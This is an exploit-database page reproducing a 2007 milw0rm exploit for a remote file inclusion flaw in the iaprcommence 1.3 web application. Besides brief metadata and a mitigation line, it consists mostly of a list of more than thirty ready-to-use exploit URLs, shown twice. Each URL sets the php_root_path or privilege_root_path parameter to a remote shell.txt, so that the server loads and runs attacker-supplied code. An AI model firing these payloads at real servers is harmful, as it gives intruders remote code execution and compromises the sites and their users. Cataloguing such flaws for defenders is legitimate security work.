header-logo
Suggest Exploit
vendor:
iaprcommence
by:
ShAy6oOoN
5.5
CVSS
MEDIUM
Remote File Inclusion
CWE
Product Name: iaprcommence
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

iaprcommence 1.3 RFI

Remote File Inclusion vulnerability in iaprcommence 1.3 allows remote attackers to include arbitrary files via a URL in the php_root_path parameter.

Mitigation:

Update to a fixed version of the software.
Source

Exploit-DB raw data:

~~~~~~~~~~~~~~~~~~~~~~~~
~ iaprcommence 1.3 RFI ~
~~~~~~~~~~~~~~~~~~~~~~~

---------------------
Author              : ShAy6oOoN
---------------------
Group               : PitBull Crew
---------------------
Script              : iaprcommence 1.3
---------------------
Download            : http://downloads.sourceforge.net/iaprcommence/CommenceV1_3.zip?modtime=1195816743&big_mirror=0
---------------------
Vulnerability Type  : Remote File Inclusion
---------------------
Method              : get
---------------------
Register_globals    : On
---------------------
Exploit URL's       :
---------------------

http://localhost/Commence/includes/db_connect.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/main_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/output_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/user_authen_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase1.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/admin/phase/phase1.php?privilege_root_path=http://localhost/shell.txt?   

http://localhost/Commence/admin/phase/phase2.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/admin/phase/phase2.php?privilege_root_path=http://localhost/shell.txt?   

http://localhost/Commence/admin/phase/phase3.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/admin/phase/phase3.php?privilege_root_path=http://localhost/shell.txt?   

http://localhost/Commence/admin/phase/phase4.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/admin/phase/phase4.php?privilege_root_path=[

http://localhost/Commence/admin/phase/phasebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/page.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/pagebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/pagebase.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/reviewer/phase/phase1.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/reviewer/phase/phase1.php?privilege_root_path=http://localhost/shell.txt?   

http://localhost/Commence/reviewer/phase/phase2.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/reviewer/phase/phase2.php?privilege_root_path=http://localhost/shell.txt?   

http://localhost/Commence/reviewer/phase/phase3.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/reviewer/phase/phase3.php?privilege_root_path=http://localhost/shell.txt?   

http://localhost/Commence/reviewer/phase/phase4.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/reviewer/phase/phase4.php?privilege_root_path=http://localhost/shell.txt?   

http://localhost/Commence/reviewer/phase/phasebase.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/user/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/user/phase/phase1.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/user/phase/phase2.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/user/phase/phase3.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/user/phase/phase4.php?php_root_path=http://localhost/shell.txt?   

http://localhost/Commence/user/phase/phasebase.php?php_root_path=http://localhost/shell.txt?


Greetings:
----------

PitBull Crew : The_PitBull - iNs - c0ol - Raz0r


Thanks To:
----------

str0ke

Your smile counts. The more smiles you share, the more we donate. Join in!



~~~~~~~~~~~~~~~~~~~~~~~
~ iaprcommence 1.3 RFI ~
~~~~~~~~~~~~~~~~~~~~~~~

---------------------
Author              : ShAy6oOoN
---------------------
Group               : PitBull Crew
---------------------
Script              : iaprcommence 1.3
---------------------
Download            : http://downloads.sourceforge.net/iaprcommence/CommenceV1_3.zip?modtime=1195816743&big_mirror=0
---------------------
Vulnerability Type  : Remote File Inclusion
---------------------
Method              : get
---------------------
Register_globals    : On
---------------------
Exploit URL's       : 
---------------------

http://localhost/Commence/includes/db_connect.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/main_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/output_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/user_authen_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase1.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/admin/phase/phase1.php?privilege_root_path=http://localhost/shell.txt?	

http://localhost/Commence/admin/phase/phase2.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/admin/phase/phase2.php?privilege_root_path=http://localhost/shell.txt?	

http://localhost/Commence/admin/phase/phase3.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/admin/phase/phase3.php?privilege_root_path=http://localhost/shell.txt?	

http://localhost/Commence/admin/phase/phase4.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/admin/phase/phase4.php?privilege_root_path=[

http://localhost/Commence/admin/phase/phasebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/page.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/pagebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/pagebase.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/reviewer/phase/phase1.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/reviewer/phase/phase1.php?privilege_root_path=http://localhost/shell.txt?	

http://localhost/Commence/reviewer/phase/phase2.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/reviewer/phase/phase2.php?privilege_root_path=http://localhost/shell.txt?	

http://localhost/Commence/reviewer/phase/phase3.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/reviewer/phase/phase3.php?privilege_root_path=http://localhost/shell.txt?	

http://localhost/Commence/reviewer/phase/phase4.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/reviewer/phase/phase4.php?privilege_root_path=http://localhost/shell.txt?	

http://localhost/Commence/reviewer/phase/phasebase.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/user/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/user/phase/phase1.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/user/phase/phase2.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/user/phase/phase3.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/user/phase/phase4.php?php_root_path=http://localhost/shell.txt?	

http://localhost/Commence/user/phase/phasebase.php?php_root_path=http://localhost/shell.txt?


Greetings:
----------

PitBull Crew : The_PitBull - iNs - c0ol - Raz0r


Thanks To:
----------

str0ke

# milw0rm.com [2007-11-25]

Navigation

Suggest Exploit

Services By CQR